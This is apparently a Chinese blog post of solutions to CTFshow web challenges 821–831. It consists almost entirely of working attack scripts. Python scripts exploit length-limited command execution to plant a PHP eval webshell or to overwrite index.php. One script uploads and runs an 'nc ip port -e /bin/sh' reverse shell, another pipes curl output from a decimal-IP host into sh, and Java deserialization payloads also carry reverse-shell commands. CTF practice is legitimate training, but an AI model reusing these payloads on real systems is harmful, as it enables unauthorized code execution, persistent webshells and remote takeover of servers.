CTFSHOW 常用姿势篇（821-831）

yu22x

已于 2022-09-16 17:28:26 修改

阅读量1.6k

点赞数 1

分类专栏： CTFSHOW web入门系列文章标签： web安全 python 安全

于 2022-06-09 09:45:37 首次发布

本文链接：https://blog.csdn.net/miuzzx/article/details/125148989

版权

CTFSHOW web入门系列专栏收录该内容

48 篇文章 55 订阅

订阅专栏

文章目录

这一部分我就是一个脚本搬运工了。

web821

可以看下这篇文章
https://www.cnblogs.com/-chenxs/p/11981586.html
这种限制长度的可以通过将想要使用的命令作为文件名进行创建，接着按时间排序写入到另一个文件中ls -t >0
最后执行0即可sh 0
用下群主在vip群发的脚本

import requests
import time

url = "http://ddfe46fa-fa05-4675-bb00-537e95a0f936.challenge.ctf.show/"

payload=[
">hp",
">1.p\\",
">d\\>\\",
">\\ -\\",
">e64\\",
">bas\\",
">7\\|\\",
">XSk\\",
">Fsx\\",
">dFV\\",
">kX0\\",
">bCg\\",
">XZh\\",
">AgZ\\",
">waH\\",
">PD9\\",
">o\\ \\",
">ech\\",
"ls -t>0",
". 0"
]
def writeFile(payload):
	data={
	"cmd":payload
	}
	requests.post(url,data=data)

def run():
	for p in payload:
		writeFile(p.strip())
		print("[*] create "+p.strip())
		time.sleep(1)

def check():
	response = requests.get(url+"1.php")
	if response.status_code == requests.codes.ok:
		print("[*] Attack success!!!Webshell is "+url+"1.php")

def main():
	run()
	check()

	


if __name__ == '__main__':
	main()

写入的文件内容为<?php eval($_GET[1]);

web822

web目录不可写，所以将文件写入到临时文件中，然后执行该文件。
不过在无数字字母中有种方法可以在这个地方使用。

#coding:utf-8
#author yu22x
import requests
url="http://dbea52c2-0b83-4770-972d-7adde3dc1677.challenge.ctf.show/"
#files={'file':'bash -i >& /dev/tcp/ip/port 0>&1'}
files={'file':'nc  ip port -e /bin/sh'}
r= requests.post(url,files=files,data={'cmd':'. /t*/*'})
html = r.text
print(html)

bash反弹没成功用的nc反弹。

web 823|824

不得不佩服群主的脑洞
首先看下payload

payload=[
">grep",
">h",
"*>j",
"rm g*",
"rm h*",
">cat",
"*>>i",
"rm c*",
"rm j",
">cp",
"*"
]

写入grep h
接着执行* > j
实际执行的是grep h index.php
得到的是index.php所有带h的行，结果如下

<?php
# @Author: h1xa
# @Last Modified by:   h1xa
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
highlight_file(__FILE__);
    shell_exec($cmd);

接着将j中的内容添加到index.php后面并且写入到i中
cat * >> i*
最后将i的copy到index.php中。
不过适用的情况不多，需要最终调用的命令带h或者p。

# @Author: h1xa
import requests
import time

url = "http://6763f093-a4c6-48a8-9740-018b234da289.challenge.ctf.show/"

payload=[
">grep",
">h",
"*>j",
"rm g*",
"rm h*",
">cat",
"*>>i",
"rm c*",
"rm j",
">cp",
"*"
]

def writeFile(payload):
	data={
	"cmd":payload
	}
	requests.post(url,data=data)

def run():
	for p in payload:
		writeFile(p.strip())
		print("[*] create "+p.strip())
		time.sleep(0.3)
	print("[*] Attack success!!!Webshell is "+url)

def main():
	run()

if __name__ == '__main__':
	main()

web825

原理类似于821，不过因为长度短了会出现相同的文件名，比如空格，可能会有多个地方使用，但是只会生成一个。
所以需要把空格改成${IFS}。最后还有一个问题，我们之前用的ls -t>0长度超过了5所以得想个其他方法。
这里用的是利用dir，
dir a b >c 会将ab写入到c文件中。
具体原理可参考https://www.sohu.com/a/208155480_354899

# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2022-05-06 13:25:41
# @Last Modified by:   h1xa
# @Last Modified time: 2022-05-10 20:55:42
# @email: h1xa@ctfer.com
# @link: https://ctfer.com


import requests
import time

url = "http://eb893c73-86c3-449f-98fe-0f82d9212110.challenge.ctf.show/"

payload = [
'>sl',
'>kt-',
'>j\\>',
'>j\\#',
'>dir',
'*>v',
'>rev',
'*v>x',
'>php',
'>a.\\',
'>\\>\\',
'>-d\\',
'>\\ \\',
'>64\\',
'>se\\',
'>ba\\',
'>\\|\\',
'>4=\\',
'>Pz\\',
'>k7\\',
'>XS\\',
'>sx\\',
'>VF\\',
'>dF\\',
'>X0\\',
'>gk\\',
'>bC\\',
'>Zh\\',
'>ZX\\',
'>Ag\\',
'>aH\\',
'>9w\\',
'>PD\\',
'>S}\\',
'>IF\\',
'>{\\',
'>\\$\\',
'>ho\\',
'>ec\\',
'sh x',
'sh j'
]

def writeFile(payload):
	data={
	"cmd":payload
	}
	requests.post(url,data=data)

def run():
	for p in payload:
		writeFile(p.strip())
		print("[*] create "+p.strip())
		time.sleep(0.3)

def check():
	response = requests.get(url+"a.php")
	if response.status_code == requests.codes.ok:
		print("[*] Attack success!!!Webshell is "+url+"a.php")

def main():
	run()
	check()

if __name__ == '__main__':
	main()

web826

# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2022-05-06 13:25:41
# @Last Modified by:   h1xa
# @Last Modified time: 2022-05-10 20:55:58
# @email: h1xa@ctfer.com
# @link: https://ctfer.com


import requests
import time

url = "http://d6373b16-848d-4656-9a30-d1fbb18d8678.challenge.ctf.show/"
#url="http://101.34.94.44/aaa/index.php"

payload = [
'>\\ \\',
'>-t\\',
'>\\>a',
'>ls\\',
'ls>v',
'>mv',
'>vt',
'*v*',
'>ls',
'l*>t',
'>cat',
'*t>z',

#这个地方的ip是用的10进制，因为用普通的ip地址存在多个点号。
#可以用这个网站转https://tool.520101.com/wangluo/jinzhizhuanhuan/
'>sh',
'>\\|\\',
'>00\\',
'>80\\',
'>\\:\\',
'>48\\',
'>11\\',
'>75\\',
'>96\\',
'>16\\',
'>\\ \\',
'>rl\\',
'>cu\\',

'sh z',
'sh a',
]
def writeFile(payload):
	data={
	"cmd":payload
	}
	requests.post(url,data=data)

def run():
	for p in payload:
		writeFile(p.strip())
		print("[*] create "+p.strip())
		time.sleep(1)

def check():
	response = requests.get(url+"1.php")
	if response.status_code == requests.codes.ok:
		print("[*] Attack success!!!Webshell is "+url+"1.php")

def main():
	run()
	check()

if __name__ == '__main__':
	main()

web827

# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2022-05-06 13:25:41
# @Last Modified by:   h1xa
# @Last Modified time: 2022-05-10 20:56:17
# @email: h1xa@ctfer.com
# @link: https://ctfer.com


import requests
import time

url = "http://ab1290cc-c3f0-4ff2-b864-a4388d4331a6.challenge.ctf.show/"

payload = [
'>\\ \\',
'>-t\\',
'>\\>a',
'>ls\\',
'ls>v',
'>mv',
'>vt',
'*v*',
'>ls',
'l*>t',
'>cat',
'*t>z',

'>php',
'>a.\\',
'>\\>\\',
'>-d\\',
'>\\ \\',
'>64\\',
'>se\\',
'>ba\\',
'>\\|\\',
'>4=\\',
'>Pz\\',
'>k7\\',
'>XS\\',
'>sx\\',
'>VF\\',
'>dF\\',
'>X0\\',
'>gk\\',
'>bC\\',
'>Zh\\',
'>ZX\\',
'>Ag\\',
'>aH\\',
'>9w\\',
'>PD\\',
'>S}\\',
'>IF\\',
'>{\\',
'>\\$\\',
'>ho\\',
'>ec\\',


'sh z',
'sh a'
]

def writeFile(payload):
	data={
	"cmd":payload
	}
	requests.post(url,data=data)

def run():
	for p in payload:
		writeFile(p.strip())
		print("[*] create "+p.strip())
		time.sleep(1)

def check():
	response = requests.get(url+"a.php")
	if response.status_code == requests.codes.ok:
		print("[*] Attack success!!!Webshell is "+url+"a.php")

def main():
	run()
	check()

if __name__ == '__main__':
	main()

web828

网上有现成的payload
https://juejin.cn/post/7069307571483443231

web829

        User user = new User("nc ip port /bin/sh"); //不知道为啥bash不行
        byte[] bytes = null;
            ByteArrayOutputStream bo = new ByteArrayOutputStream();
            ObjectOutputStream oo = new ObjectOutputStream(bo);
            oo.writeObject(user);
            bytes = bo.toByteArray();
            bo.close();
            oo.close();
        byte[] userData  = Base64.getEncoder().encode(bytes);
        for(int x= 0 ; x < userData.length; x++) {
            System.out.print((char)userData[x]);
        }

传参的时候记得url编码

web830

exec漏洞点在BaseUser中，但是User类继承了BaseUser，所以我们可以通过User类给secret参数赋值。

User user = new User("123");
user.secret="nc ip port -e /bin/sh";
byte[] bytes = null;
ByteArrayOutputStream bo = new ByteArrayOutputStream();
ObjectOutputStream oo = new ObjectOutputStream(bo);
oo.writeObject(user);
bytes = bo.toByteArray();
bo.close();
oo.close();
byte[] userData  = Base64.getEncoder().encode(bytes);
for(int x= 0 ; x < userData.length; x++) {
    System.out.print((char)userData[x]);
}

不过也可以直接通过实例化BaseUser直接给secert赋值

BaseUser user = new BaseUser();
user.secret="nc ip port -e /bin/sh";
byte[] bytes = null;
ByteArrayOutputStream bo = new ByteArrayOutputStream();
ObjectOutputStream oo = new ObjectOutputStream(bo);
oo.writeObject(user);
bytes = bo.toByteArray();
bo.close();
oo.close();
byte[] userData  = Base64.getEncoder().encode(bytes);
for(int x= 0 ; x < userData.length; x++) {
    System.out.print((char)userData[x]);
}

web831

加了个过滤，不允许序列化User类，所以直接用830中的第二种方法就可以了

BaseUser user = new BaseUser();
user.secret="nc ip port -e /bin/sh";
byte[] bytes = null;
ByteArrayOutputStream bo = new ByteArrayOutputStream();
ObjectOutputStream oo = new ObjectOutputStream(bo);
oo.writeObject(user);
bytes = bo.toByteArray();
bo.close();
oo.close();
byte[] userData  = Base64.getEncoder().encode(bytes);
for(int x= 0 ; x < userData.length; x++) {
    System.out.print((char)userData[x]);
}